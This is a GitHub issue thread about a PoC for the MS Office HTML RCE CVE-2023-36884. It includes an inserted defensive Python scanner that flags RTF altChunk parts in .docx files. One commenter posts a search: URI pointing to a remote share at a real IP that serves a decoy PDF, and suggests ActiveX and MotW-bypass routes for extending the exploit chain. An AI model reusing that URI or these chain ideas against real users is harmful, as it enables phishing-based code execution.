jakabakos / CVE-2023-36884-MS-Office-HTML-RCE

MS Office and Windows HTML RCE (CVE-2023-36884) - PoC and exploit

Due to a lack of further information, the exact exploitation can not be shown. #2

Open danielsadoc opened 1 year ago

danielsadoc commented 1 year ago

Please, what is meant by "Due to a lack of further information, the exact exploitation can not be shown."? What are the assumptions/system requirements for the provided PoC to work?

jakabakos commented 1 year ago

Hey!

  1. The original attack chain is quite complex and there is not enough public information about it, so I was able to create a PoC about the first part (that is related to altChunk and embedding RTF). This is what this script does. Soon the related blog post will be published on vsociety and everything will be clearer, hopefully.
  2. This is a Python script, so there are no requirements beyond having Python3 and the mentioned pip packages installed on the system.
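
The comment above says the PoC covers the altChunk part of the chain (an RTF payload imported into a .docx through an altChunk relationship). As an added, defender-side example that is not code from this repository, the scanner below lists every altChunk relationship in a .docx and flags those whose target part is RTF; the sample document it builds is constructed only to exercise the check and is not the PoC's output.

```python
import io
import re
import zipfile

# Relationship type Word uses for altChunk ("alternative format chunk") parts,
# which let a .docx pull external content such as RTF into the document body.
ALTCHUNK_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/aFChunk"
DOC_RELS = "word/_rels/document.xml.rels"


def find_altchunk_parts(docx_bytes):
    """Return [(part_name, is_rtf)] for every altChunk relationship of the
    main document part; is_rtf is True when the target part starts with {\\rtf."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        names = set(z.namelist())
        if DOC_RELS not in names:
            return findings
        rels = z.read(DOC_RELS).decode("utf-8", "replace")
        for tag in re.findall(r"<Relationship\b[^>]*>", rels):
            rtype = re.search(r'Type="([^"]+)"', tag)
            target = re.search(r'Target="([^"]+)"', tag)
            if not (rtype and target) or rtype.group(1) != ALTCHUNK_REL:
                continue
            t = target.group(1)
            # Absolute targets are package-rooted; relative ones resolve under word/.
            part = t.lstrip("/") if t.startswith("/") else "word/" + t
            head = z.read(part)[:5] if part in names else b""
            findings.append((part, head == b"{\\rtf"))
    return findings


def build_sample_docx(with_rtf_altchunk):
    """Constructed, minimal .docx skeleton for testing the scanner only
    (not a real Word document and not the repository's PoC output)."""
    rels = '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    if with_rtf_altchunk:
        rels += f'<Relationship Id="rId9" Type="{ALTCHUNK_REL}" Target="afchunk.rtf"/>'
    rels += "</Relationships>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr(DOC_RELS, rels)
        if with_rtf_altchunk:
            z.writestr("word/afchunk.rtf", "{\\rtf1 constructed placeholder}")
    return buf.getvalue()


if __name__ == "__main__":
    for flagged in (False, True):
        print(flagged, find_altchunk_parts(build_sample_docx(flagged)))
```

A hit only says the document imports an RTF chunk, which legitimate files can also do; treat it as a triage signal and inspect the RTF part itself.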

hastalamuerte commented 9 months ago

https://unit42.paloaltonetworks.com/new-cve-2023-36584-discovered-in-attack-chain-used-by-russian-apt/ Maybe it can help to create a PoC. There is research about a VBS MotW bypass on X by Will Dormann and in other posts.

hastalamuerte commented 9 months ago

search:query=New_Agreement.pdf&crumb=location:\84.32.189.74@80\underwall\society&displayname=Downloads

Here is an example of using and abusing MS Search. I assumed, when Follina was revealed, that other handlers would be abused. BTW, there are many more of them.

And some more info: https://thehackernews.com/2024/02/darkme-malware-targets-traders-using.html?m=1 https://www.trendmicro.com/it_it/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html

It's not a doc, but I think there is some way to use it in rels. (attached image: water-hydra-chain-2.jpg)

hastalamuerte commented 9 months ago

Also, maybe there is a possibility to use it with an ActiveX button or some other elements in the doc.